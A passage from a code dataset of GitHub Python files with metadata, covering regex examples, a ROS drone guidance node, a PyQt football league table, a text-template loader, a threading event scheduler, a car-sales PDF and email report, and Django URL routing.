main()\n","repo_name":"halterman/PythonBook-SourceCode","sub_path":"Chap11/groupwordslist.py","file_name":"groupwordslist.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"21"} +{"seq_id":"74473354934","text":"\"\"\"\nEscape codes | Use\n-----------------------------------------\n d | Matches digit\n D | Matches non-digit\n s | Matches whitespace\n S | Matches non-whitespace\n w | Matches alphanumeric\n W | Matches non-alphanumeric\n\"\"\"\n\n\n\"\"\"\nSpecial Note: When we compile patterns, they will get automatically cached so \nif we aren’t using a lot of regular expressions in our code, then we may not \nneed to save the compiled object to a variable.\n\"\"\"\nimport re\n\ntext = \"The ants go marching one by one\"\n\nstrings = [\"the\", \"one by\"]\n\nfor string in strings:\n regex = re.compile(string)\n print(\"regex-> \", regex)\n match = re.search(string, text)\n print(\"match\", match)\n if match:\n print('Found \"{}\" in \"{}\"'.format(string, text))\n text_pos = match.span()\n print(\"->\", text[match.start() : match.end()])\n else:\n print('Did not find \"{}\"'.format(string))\n\n\n# findall()\nprint(\"Findall()\")\nsilly_string = \"the cat in the hat\"\npattern = \"the\"\nprint(re.findall(pattern, silly_string))\n\n\n# finditer()\nprint(\"Finditer()\")\n\n\nsilly_string = \"the cat in the hat\"\npattern = \"the\"\n\nfor match in re.finditer(pattern, silly_string):\n s = \"Found '{group}' at {begin}:{end}\".format(\n group=match.group(), begin=match.start(), end=match.end()\n )\n print(s)\n\n\n# Backslashes\ntesting_string = 'python \"\"'\nprint(testing_string) # python \"\"\n\ntesting_string = 'python \"\\\\\"'\nprint(testing_string) # python \"\\\"\n\ntesting_string = r'python \"\\\"'\nprint(testing_string) # python \"\\\"\n","repo_name":"OvePa/P201","sub_path":"regex/pattern_matching.py","file_name":"pattern_matching.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10289551593","text":"#!/usr/bin/python3\n\nimport rospy \nimport std_msgs.msg\nimport sensor_msgs.msg\n\nfrom scipy.spatial.transform import Rotation\n\nfrom geometry_msgs.msg import TwistStamped, PointStamped, QuaternionStamped, PoseWithCovarianceStamped\n\nfrom anafi_uav_msgs.msg import PointWithCovarianceStamped\nfrom anafi_uav_msgs.srv import SetDesiredPosition, SetDesiredPositionRequest, SetDesiredPositionResponse\n\nimport numpy as np\nimport guidance_helpers.utilities as utilities\n\nnp.warnings.filterwarnings('ignore', category=np.VisibleDeprecationWarning) \n\n\nclass PurePursuitGuidanceLaw():\n \"\"\"\n Guidance law generating the desired velocity based on the \n desired and current position \n \"\"\"\n def __init__(self) -> None:\n rospy.init_node(\"pure_pursuit_guidance_node\")\n\n controller_rate = rospy.get_param(\"~node_rate\", default = 20)\n self.dt = 1.0 / controller_rate \n self.rate = rospy.Rate(controller_rate)\n\n # Initialize parameters\n pure_pursuit_params = rospy.get_param(\"~pure_pursuit_parameters\")\n velocity_limits = rospy.get_param(\"~velocity_limits\")\n \n self.ua_max = pure_pursuit_params[\"ua_max\"]\n self.lookahead = pure_pursuit_params[\"lookahead\"]\n self.fixed_kappa = pure_pursuit_params[\"kappa\"]\n\n self.vx_limits = velocity_limits[\"vx\"]\n self.vy_limits = velocity_limits[\"vy\"]\n self.vz_limits = velocity_limits[\"vz\"]\n\n self.desired_altitude : float = -1.0\n\n self.position_timestamp : std_msgs.msg.Time = None\n self.attitude_timestamp : std_msgs.msg.Time = None\n self.desired_position_timestamp : std_msgs.msg.Time = None\n\n self.desired_position_ned : np.ndarray = np.zeros((3, 1)) # [xd, yd, zd]\n self.position_body : np.ndarray = None \n\n self.last_rotation_matrix_body_to_vehicle : np.ndarray = None\n\n # Set up subscribers \n rospy.Subscriber(\"/guidance/desired_ned_position\", PointStamped, self._desired_ned_pos_cb)\n rospy.Subscriber(\"/anafi/attitude\", QuaternionStamped, self._attitude_cb)\n\n self.use_ned_pos_from_gnss : bool = rospy.get_param(\"/use_ned_pos_from_gnss\")\n if self.use_ned_pos_from_gnss:\n rospy.loginfo(\"Pure pursuit using position estimates from GNSS. Estimates from EKF disabled\")\n rospy.Subscriber(\"/anafi/ned_pos_from_gnss\", PointStamped, self._ned_pos_cb)\n else:\n rospy.loginfo(\"Pure pursuit using position estimates from EKF. Position estimates from GNSS disabled\")\n rospy.Subscriber(\"/estimate/ekf\", PoseWithCovarianceStamped, self._ekf_cb)\n\n # Set up publishers\n self.reference_velocity_publisher = rospy.Publisher(\"/guidance/pure_pursuit/velocity_reference\", TwistStamped, queue_size=1)\n\n\n def _ekf_cb(self, msg : PoseWithCovarianceStamped) -> None:\n \"\"\"\n Callback setting the current poisition from the EKF estimate. Note that the position\n estimate is in body, and it is drone to helipad (origin). Thus, to get origin to drone,\n the values are negated \n \"\"\"\n msg_timestamp = msg.header.stamp\n\n if not utilities.is_new_msg_timestamp(self.position_timestamp, msg_timestamp):\n # Old message\n return\n \n self.position_timestamp = msg_timestamp\n self.position_body = -np.array([msg.pose.pose.position.x, msg.pose.pose.position.y, msg.pose.pose.position.z], dtype=float).reshape((3, 1)) \n\n\n def _desired_ned_pos_cb(self, msg : PointStamped) -> None:\n \"\"\"\n Callback setting the desired position for the guidance to track. \n The target position is assumed in NED \n \"\"\"\n msg_timestamp = msg.header.stamp\n\n if not utilities.is_new_msg_timestamp(self.desired_position_timestamp, msg_timestamp):\n # Old message\n return\n \n self.desired_position_timestamp = msg_timestamp\n self.desired_position_ned = np.array([msg.point.x, msg.point.y, msg.point.z], dtype=float).reshape((3, 1)) \n\n\n def _ned_pos_cb(self, msg : PointStamped) -> None:\n \"\"\"\n Position estimates using the direct bridge-estimates in NED. These measurements are \n origin to drone position\n \"\"\"\n msg_timestamp = msg.header.stamp\n\n if not utilities.is_new_msg_timestamp(self.position_timestamp, msg_timestamp):\n # Old message\n return\n \n if self.last_rotation_matrix_body_to_vehicle is None:\n # Impossible to convert positions to body frame\n return\n \n # Positions must be transformed to body\n self.position_timestamp = msg_timestamp\n self.position_body = self.last_rotation_matrix_body_to_vehicle.T @ np.array([msg.point.x, msg.point.y, msg.point.z], dtype=float).reshape((3, 1)) \n\n\n def _attitude_cb(self, msg : QuaternionStamped) -> None:\n msg_timestamp = msg.header.stamp\n\n if not utilities.is_new_msg_timestamp(self.attitude_timestamp, msg_timestamp):\n # Old message\n return\n \n self.attitude_timestamp = msg_timestamp\n rotation = Rotation.from_quat([msg.quaternion.x, msg.quaternion.y, msg.quaternion.z, msg.quaternion.w])\n self.attitude_rpy = rotation.as_euler('xyz', degrees=False).reshape((3, 1))\n self.last_rotation_matrix_body_to_vehicle = rotation.as_matrix()\n\n\n def _clamp(\n self, \n value: float, \n limits: tuple\n ) -> float:\n return np.min([np.max([value, limits[0]]), limits[1]]) \n\n\n def _get_pos_error_body(self) -> np.ndarray:\n \"\"\"\n Calculates a position error in body\n Assumes the attitude is known relatively correctly, such that body can be converted\n to NED\n \"\"\"\n if (self.position_timestamp is None):\n return np.zeros((3, 1))\n\n pos_error_ned = self.last_rotation_matrix_body_to_vehicle @ self.position_body - self.desired_position_ned\n pos_error_body = self.last_rotation_matrix_body_to_vehicle.T @ pos_error_ned\n\n return pos_error_body\n\n\n def calculate_velocity_reference(self) -> None:\n \"\"\"\n Generate a velocity reference from a position error using the pure\n pursuit guidance law as defined in Fossen 2021.\n \"\"\"\n twist_ref_msg = TwistStamped()\n\n vel_target = np.zeros((3, 1)) # Possible extension to use constant bearing guidance in the future\n\n while not rospy.is_shutdown():\n if self.position_body is None:\n self.rate.sleep()\n continue\n\n pos_error = self._get_pos_error_body()\n pos_error_normed = np.linalg.norm(pos_error)\n\n if pos_error_normed > 1e-3:\n kappa = (pos_error_normed * self.ua_max) / (np.sqrt(pos_error_normed + self.lookahead**2))\n vel_ref_unclamped = vel_target - (kappa * pos_error) / (pos_error_normed) \n else:\n vel_ref_unclamped = np.zeros((3, 1)).ravel()\n\n vel_ref_x = self._clamp(vel_ref_unclamped[0], self.vx_limits)\n vel_ref_y = self._clamp(vel_ref_unclamped[1], self.vy_limits)\n vel_ref_z = self._clamp(vel_ref_unclamped[2], self.vz_limits)\n\n twist_ref_msg.header.stamp = rospy.Time.now()\n twist_ref_msg.twist.linear.x = vel_ref_x\n twist_ref_msg.twist.linear.y = vel_ref_y\n twist_ref_msg.twist.linear.z = vel_ref_z\n\n self.reference_velocity_publisher.publish(twist_ref_msg)\n self.rate.sleep()\n\n\ndef main():\n guidance_law = PurePursuitGuidanceLaw()\n guidance_law.calculate_velocity_reference()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"oyssolbo/anafi_gnc","sub_path":"guidance/scripts/pure_pursuit.py","file_name":"pure_pursuit.py","file_ext":"py","file_size_in_byte":7109,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"73075930611","text":"from PyQt5 import QtGui\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import QTableWidget, QTableWidgetItem\n\nfrom controllers.team_controller import getTeamsData\nfrom data_loaders.utils import getTeamLogo\nfrom utils.font_utils import get_font\nfrom view.team_window import TeamWindow\n\n\nclass LeagueTable(QTableWidget):\n def __init__(self, opt=\"All Matches\"):\n super().__init__()\n self.team_window = None\n self.setRowCount(20)\n self.setColumnCount(10)\n columns = (\"\", \"Club Name\", \"Played\", \"W\", \"D\", \"L\", \"GF\", \"GA\", \"GD\", \"Points\")\n self.setHorizontalHeaderLabels(columns)\n self.setColumnWidth(0, 30)\n self.setColumnWidth(1, 250)\n self.load_data(opt)\n self.set_style()\n self.itemDoubleClicked.connect(self.click_handler)\n\n def set_style(self):\n for col in range(1, self.columnCount()):\n self.item(0, col).setBackground(QtGui.QColor(238, 206, 0))\n for row in range(1, 4):\n for col in range(1, self.columnCount()):\n self.item(row, col).setBackground(QtGui.QColor(153, 204, 255))\n for row in range(4, 6):\n for col in range(1, self.columnCount()):\n self.item(row, col).setBackground(QtGui.QColor(255, 204, 153))\n for row in range(17, 20):\n for col in range(1, self.columnCount()):\n self.item(row, col).setBackground(QtGui.QColor(255, 153, 153))\n\n def load_data(self, opt):\n cols = [\"league_position\", \"wins\", \"draws\", \"losses\",\n \"goals_scored\", \"goals_conceded\", \"goal_difference\", \"points\"]\n matches_played = \"38\"\n\n if opt == \"Home Only\":\n cols = [col + \"_home\" for col in cols]\n matches_played = \"19\"\n if opt == \"Away Only\":\n cols = [col + \"_away\" for col in cols]\n matches_played = \"19\"\n\n teams_data = getTeamsData()\n for team in teams_data:\n row = int(team[cols[0]]) - 1 # league_position\n logo_widget = getTeamLogo(team[\"common_name\"])\n logo_widget.setAlignment(Qt.AlignHCenter)\n self.setCellWidget(row, 0, logo_widget)\n self.setItem(row, 1, QTableWidgetItem(team[\"common_name\"]))\n self.setItem(row, 2, QTableWidgetItem(matches_played))\n self.setItem(row, 3, QTableWidgetItem(team[cols[1]])) # wins\n self.setItem(row, 4, QTableWidgetItem(team[cols[2]])) # draws\n self.setItem(row, 5, QTableWidgetItem(team[cols[3]])) # losses\n self.setItem(row, 6, QTableWidgetItem(team[cols[4]])) # goals scored\n self.setItem(row, 7, QTableWidgetItem(team[cols[5]])) # goals conceded\n self.setItem(row, 8, QTableWidgetItem(team[cols[6]])) # goals difference\n font = get_font(bold=True)\n point_item = QTableWidgetItem(str(team[\"points\"]))\n point_item.setFont(font)\n self.setItem(row, 9, point_item)\n\n def click_handler(self, item: QTableWidgetItem):\n if item.column() == 0 or item.column() == 1:\n team_common_name = self.item(item.row(), 1).text()\n self.team_window = TeamWindow(team_common_name)\n self.team_window.show()","repo_name":"maitruongson-vn107/EPL-1819-Dashboard","sub_path":"view/main_window_components/league_table.py","file_name":"league_table.py","file_ext":"py","file_size_in_byte":3246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15485275826","text":"#@@@@@@@@@@@@@@@Pheonix.Store.ObjNQL.TxtONQL@@@@@@@@@@@@@@@@@@@||\n'''\n---\n<(META)>:\n\tDOCid: f44e5ac0-73c7-4d95-a280-ca9bcd7b8491\n\tname:\n\tdescription: >\n\t\tOpen Plain Text File Objects and Fill Text Template as Needed\n\texpirary: <[expiration]>\n\tversion: <[version]>\n\tpath: <[LEXIvrs]>pheonix/elements\n\toutline: <[outline]>\n\tauthority: document|this\n\tsecurity: sec|lvl2\n\t<(WT)>: -32\n'''\n# -*- coding: utf-8 -*-\n#===============================================================================||\nimport datetime as dt, pprint, time#\t\t\t\t\t\t\t\t\t\t\t||\nfrom os.path import abspath, dirname, exists, join#\t\t\t\t\t\t\t\t||\nfrom os import makedirs#\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n#===============================================================================||\nfrom condor import thing#\t\t\t\t\t\t\t\t\t\t||\nfrom subtrix import subtrix#\t\t\t\t\t\t\t\t\t||\n#===============================================================================||\nhere = join(dirname(__file__),'')#\t\t\t\t\t\t\t\t\t\t\t\t||\nthere = abspath(join('../../..'))#\t\t\t\t\t\t\t\t\t\t\t\t||set path at pheonix level\nversion = '0.0.0.0.0.0'#\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\nlog = False\n#===============================================================================||\nclass doc:#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t'Define Document Text from given File'#\t\t\t\t\t\t\t\t\t\t||\n\tversion = '0.0.0.0.0.0.0'#\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\tdef __init__(self, doc, kind=None, cfg=None):#\t\t\t\t\t\t\t\t||\n\t\tself.doc = doc#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\tself.kind = kind#\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\tif cfg == None:#\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\t\tcfg = f'{here}z-data_/objnql.yaml'#\t\t\t\t\t\t\t\t\t||\n\tdef append(self, text, fill=None, cfg={}):\n\t\t''' '''\n\t\tself.write(text, fill, cfg, 'a')\n\t\treturn self\n\tdef load(self, thing=None):#\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\t'''Scan text and replace include codes with other text files '''\n\t\tif thing == None:#\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\t\tthing = self.doc#\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\ttry:#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\t\twith open(thing, 'r') as doc:#\t\t\t\t\t\t\t\t\t\t||\n\t\t\t\ttext = doc.read()#\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\texcept Exception as e:#\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\t\ttext = ''#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\t\tm = ['Couldnt Open',thing,'due to',e]#\t\t\t\t\t\t\t\t||\n\t\t\tprint(*m)#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\tif log: print('TEXT', text)\n\t\tfnl = thing.rfind('/')#\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\tbase_path = thing[:fnl + 1]#\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\tstartpt, depth, fstart, fend = 0, 0, '<(INCL)>', '.yaml'#\t\t\t\t||\n\t\twhile True:#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\t\tfspl = text[startpt:].find(fstart) + startpt#\t\t\t\t\t\t\t||\n\t\t\tlinepos = text[:fspl].rfind('\\n')#\t\t\t\t\t\t\t\t\t||\n\t\t\tdepth = text[linepos:fspl].find(' ')#\t\t\t\t\t\t\t\t||\n\t\t\tif depth == -1:#\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\t\t\tdepth = 0#\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\t\tdepth += 1#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\t\tif fspl == startpt - 1:#\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\t\t\tbreak#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\t\tfspl = fspl#\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\t\tfepl = text[fspl:].find(fend) + fspl + len(fend)#\t\t\t\t\t\t||\n\t\t\tpattern = text[fspl:fepl]#\t\t\t\t\t\t\t\t\t\t\t||\n\t\t\tif pattern == '':#\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\t\t\tstartpt = fepl + len(ntext) - len(pattern)#\t\t\t\t\t\t\t||\n\t\t\t\tcontinue#\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\t\tpath = pattern.replace(fstart, '')#\t\t\t\t\t\t\t||\n\t\t\tif log: print('Pattern', path, 'basepath', base_path)\n\t\t\tpath = join(abspath(base_path), path)\n\t\t\tif log: print('Pattern', path, 'basepath', base_path)\n\t\t\tif exists(path):#\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\t\t\tntext = self.load(path)#\t\t\t\t\t\t\t\t\t\t||\n\t\t\t\tntext = ntext.replace('---', ' ')#\t\t\t\t\t\t\t\t||\n\t\t\t\tntext = ntext.replace('\\n', '\\n' + ' ' * depth)#\t\t\t\t\t||\n\t\t\telse:#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\t\t\tntext = path#\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\t\tdepth = '\\n' + ' ' * depth#\t\t||\n\t\t\ttext = f'{text[:fspl]}{depth}{ntext}{text[fepl:]}'#\t\t\t\t\t\t\t\t||\n\t\t\tstartpt = fepl + len(ntext) - len(path)#\t\t\t\t\t\t\t\t||\n\t\t\tpath = ''#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\treturn text#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\tdef kill(self, lvl=5):#\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\tif lvl == 'mustbethiscode':#\t\t\t\t\t\t\t\t\t\t\t||\n\t\t\tpass#hard delete#\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\telse:#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\t\tpass#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\treturn self#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\tdef process(self):#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\tif self.fill != None:#\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\t\tself.dikt = subtrix.mechanism(self.text, self.fill).run()#\t\t\t||\n\t\t\tself.text = self.dikt#\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\treturn self#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\tdef read(self, fill=None, kind=None):#\t\t\t\t\t\t\t\t\t\t||\n\t\tself.fill, encode = fill, 0#\t\t\t\t\t\t\t\t\t\t\t||\n\t\tself.text = self.load(self.doc)#\t\t\t\t\t\t\t\t\t\t||\n\t\tself.process()#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\tself.lines = self.text.split('\\n')#\t\t\t\t\t\t\t\t\t\t||\n\t\tself.table = []#\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\tself.frame = []#\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\tself.go = False#\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\tyield self#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\tdef search(self, term, boundaries=None):\n\t\t'''Search document text for given term and boundary conditions\n\t\t\ta none boundary should return a simple count value and true statement\n\t\t\tfor the search term in the text\n\n\t\t'''\n\n\t\treturn self\n\tdef touch(self, phile):#\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\tphile = phile[:phile.rfind('/')]#\t\t\t\t\t\t\t\t\t\t||\n\t\tif not exists(phile):#\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\t\tprint('Touch File', phile)\n\t\t\tmakedirs(phile)#\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\tdef write(self, text, fill=None, cfg={}, method='w'):#\t\t\t\t\t\t\t\t||\n\t\tif cfg == {}:\n\t\t\tcfg = {'how': 'raw'}\n\t\thow = cfg['how']\n\t\tif self.doc.replace('\\s', '') == '': #short cicuirting writing blank documents\n\t\t\treturn\n\t\tself.touch(self.doc)\n\t\tself.text, self.fill = text, fill#\t\t\t\t\t\t\t\t\t\t||\n\t\twith open(self.doc, 'w') as doc:#\t\t\t\t\t\t\t\t\t\t||\n\t\t\tif how == 'raw':\n\t\t\t\tdoc.write(str(self.text))#\t\t\t\t\t\t\t\t\t\t||\n\t\t\telif how == 'pretty':\n\t\t\t\tpprint.pprint(self.text, stream=doc)\ndef chunk(f, csize=4096):#\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\tyield iter(lambda: f.read(csize), b'')#\t\t\t\t\t\t\t\t\t\t||\n#===========================Code Source Examples================================||\n'''\nhttp://stupidpythonideas.blogspot.com/2014/07/three-ways-to-read-files.html\n'''\n#===============================================================================||\n'''\n<(DNA)>:\n\t2018004051530:\n\t\tdoc:\n\t\t\tversion: <[active:.version]>\n\t\t\ttest: PASS\n\t\t\tdescription: >\n\t\t\twork:\n\t2018004051421:\n\t\tdoc:\n\t\t\tversion: 0.0.0.0.0.1\n\t\t\ttest: PASS\n\t\t\tdescription: >\n\t\t\t\trewrite to process template first and populate\n\t\t\t\twith given data alinearly\n\t\t\twork:\n'''\n#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@||\n","repo_name":"solubrew/fxsquirl","sub_path":"fxsquirl/objnql/txtonql.py","file_name":"txtonql.py","file_ext":"py","file_size_in_byte":5910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6444460387","text":"import threading\nfrom time import sleep as slp\nimport enum\nfrom queue import Queue\nfrom bizare.core.call_backs import singleton\n\n\nclass Events(enum.Enum):\n DONE = 0\n INT1 = 3\n INT2 = 4\n INT3 = 5\n INT4 = 6\n INT5 = 7\n INT6 = 8\n INT7 = 9\n INT8 = 10\n INT9 = 11\n\n\n@singleton\nclass EventScheduler:\n def __init__(self):\n self.__qu = Queue()\n self.__registrations = dict()\n\n def add(self, enum):\n self.__qu.put(enum)\n\n def schedule(self):\n if not self.__qu.empty():\n e = self.__qu.get()\n e = self.__registrations.get(e)\n if e:\n e.set()\n e.clear()\n\n def register_event(self, event, type_of_event):\n self.__registrations.update({type_of_event: event})\n\n\nclass EventedTrhreadTask(threading.Thread):\n def __init__(self, name, fucn, *args, **kwargs):\n threading.Thread.__init__(self)\n self.name = name\n self.event = threading.Event()\n self._kill = True\n self._running = False\n\n self._task = fucn\n self._task_args = args\n self._task_kwargs = kwargs\n\n def get_id(self):\n if hasattr(self, '_thread_id'):\n return self._thread_id\n\n for id, thread in threading._active.items():\n if thread is self:\n return id\n\n def event_cb(self):\n return self.event\n\n def kill(self):\n self._kill = False\n\n def run(self):\n while True:\n self.event.wait() # set->clear\n\n if not self._kill:\n break\n\n self._task(*self._task_args, **self._task_kwargs)\n slp(.1)\n\n\nclass CleanUp:\n def __init__(self):\n self.__threads = []\n\n def add_thread(self, obj):\n self.__threads.append(obj)\n\n def clean(self):\n for t in self.__threads:\n t.kill()\n\n for k in self.__threads:\n if not k.event.is_set():\n k.event.set()\n else:\n k.event.clear()\n k.event.set()\n\n for t in self.__threads:\n t.join()","repo_name":"Fananos/bizare","sub_path":"bizare/core/event_basic.py","file_name":"event_basic.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7020225296","text":"\r\n#!/usr/bin/env python3\r\n\r\nimport json\r\nimport locale\r\nimport sys\r\nimport emails\r\nimport os\r\nimport reports\r\n\r\n\r\ndef load_data(filename):\r\n \"\"\"Loads the contents of filename as a JSON file.\"\"\"\r\n with open(filename) as json_file:\r\n data = json.load(json_file)\r\n return data\r\n\r\n\r\ndef format_car(car):\r\n \"\"\"Given a car dictionary, returns a nicely formatted name.\"\"\"\r\n return \"{} {} ({})\".format(\r\n car[\"car_make\"], car[\"car_model\"], car[\"car_year\"])\r\n\r\ncar_sales ={}\r\ndef calculate_sales_per_year(car, total_sales):\r\n if(car[\"car_year\"] in car_sales):\r\n car_sales[car[\"car_year\"]]=car_sales[car[\"car_year\"]]+total_sales\r\n else:\r\n car_sales[car[\"car_year\"]]=total_sales\r\n\r\ndef returns_most_popular_car_year():\r\n key=''\r\n value=0\r\n for k in car_sales:\r\n if(car_sales[k]>value):\r\n key = k\r\n value = car_sales[k]\r\n return \"The most popular year was \"+str(key)+\" with \"+str(value)+\" sales.\"\r\n\r\ndef process_data(data):\r\n \"\"\"Analyzes the data, looking for maximums.\r\n\r\n Returns a list of lines that summarize the information.\r\n \"\"\"\r\n locale.setlocale(locale.LC_ALL, 'en_US.UTF8')\r\n max_revenue = {\"revenue\": 0}\r\n max_sales = {\"total_sales\": 0}\r\n\r\n for item in data:\r\n # Calculate the revenue generated by this model (price * total_sales)\r\n # We need to convert the price from \"$1234.56\" to 1234.56\r\n item_price = locale.atof(item[\"price\"].strip(\"$\"))\r\n item_revenue = item[\"total_sales\"] * item_price\r\n if item_revenue > max_revenue[\"revenue\"]:\r\n item[\"revenue\"] = item_revenue\r\n max_revenue = item\r\n # TODO: also handle max sales\r\n if item[\"total_sales\"] > max_sales[\"total_sales\"]:\r\n max_sales = item\r\n # TODO: also handle most popular car_year\r\n calculate_sales_per_year(item[\"car\"],item[\"total_sales\"])\r\n\r\n summary = [\r\n \"The {} generated the most revenue: ${}\".format(\r\n format_car(max_revenue[\"car\"]), max_revenue[\"revenue\"]),\r\n \"The {} had the most sales: {}\".format(\r\n format_car(max_sales[\"car\"]), max_sales[\"total_sales\"]),\r\n returns_most_popular_car_year()\r\n ]\r\n\r\n return summary\r\n\r\n\r\ndef cars_dict_to_table(car_data):\r\n \"\"\"Turns the data in car_data into a list of lists.\"\"\"\r\n table_data = [[\"ID\", \"Car\", \"Price\", \"Total Sales\"]]\r\n for item in car_data:\r\n table_data.append([item[\"id\"], format_car(item[\"car\"]), item[\"price\"], item[\"total_sales\"]])\r\n return table_data\r\n\r\ndef pdf_generator(summary,data):\r\n table_data=cars_dict_to_table(data)\r\n result=''\r\n for line in summary:\r\n result=result+line+'
'\r\n reports.generate(\"/tmp/reportCars.pdf\", \"Sales Summary for last month\",result,table_data )\r\n\r\n\r\ndef email_send_report(summary):\r\n sender = \"automation@example.com\"\r\n receiver = \"{}@example.com\".format(os.environ.get('USER'))\r\n subject = \"Sales summary for last month\"\r\n body = '\\n'.join(summary)\r\n message = emails.generate(sender, receiver, subject, body, \"/tmp/reportCars.pdf\")\r\n emails.send(message)\r\n\r\ndef main(argv):\r\n \"\"\"Process the JSON data and generate a full report out of it.\"\"\"\r\n data = load_data(\"/home/student-04-80a26181b2f9/car_sales.json\")\r\n summary = process_data(data)\r\n # TODO: turn this into a PDF report\r\n pdf_generator(summary,data)\r\n # TODO: send the PDF report as an email attachment\r\n email_send_report(summary)\r\n\r\nif __name__ == \"__main__\":\r\n main(sys.argv)\r\n","repo_name":"thiagofnunes/Google-IT-Automation-with-Python-Professional-Certificate","sub_path":"cars.py","file_name":"cars.py","file_ext":"py","file_size_in_byte":3393,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"21"} +{"seq_id":"34433609018","text":"\"\"\"drfDemo URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom rest_framework import permissions\nfrom rest_framework.documentation import include_docs_urls\nfrom drf_yasg.views import get_schema_view\nfrom drf_yasg import openapi\n\nschema_view = get_schema_view(\n openapi.Info(\n title='API接口文档',\n default_version='v1',\n description='接口文档平台',\n # terms_of_service='http://api.xxx.com',\n contact=openapi.Contact(email='hybpjx@qq.com'),\n license=openapi.License(name='License')\n ),\n public=True, # 允许所有人访问\n # 权限类\n # permission_classes=(permissions.IsAuthenticated,), # 允许所有人访问\n)\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path(\"api/\", include(\"students.urls\")),\n path(\"api/\", include(\"stuapi.urls\")),\n path(\"seri/\", include(\"sers.urls\")),\n path(\"req/\", include(\"req.urls\")),\n path(\"demo/\", include(\"demo.urls\")),\n path(\"school/\", include(\"school.urls\")),\n path(\"opt/\", include(\"opt.urls\")),\n\n path('docs/', include_docs_urls(title='说明文档')),\n\n path('doc/', schema_view.with_ui('swagger', cache_timeout=0), name='schema-swagger'),\n\n]\n","repo_name":"hybpjx/Drf-Vue-Studing","sub_path":"drfDemo/drfDemo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"43199947887","text":"import os\nimport subprocess\n\nimport sys\nfrom colorclass import Color\n\n__dir__ = os.path.dirname(os.path.abspath(__file__))\n\n\ndef execute(cmds, output=False, exit=False):\n output = None if output else 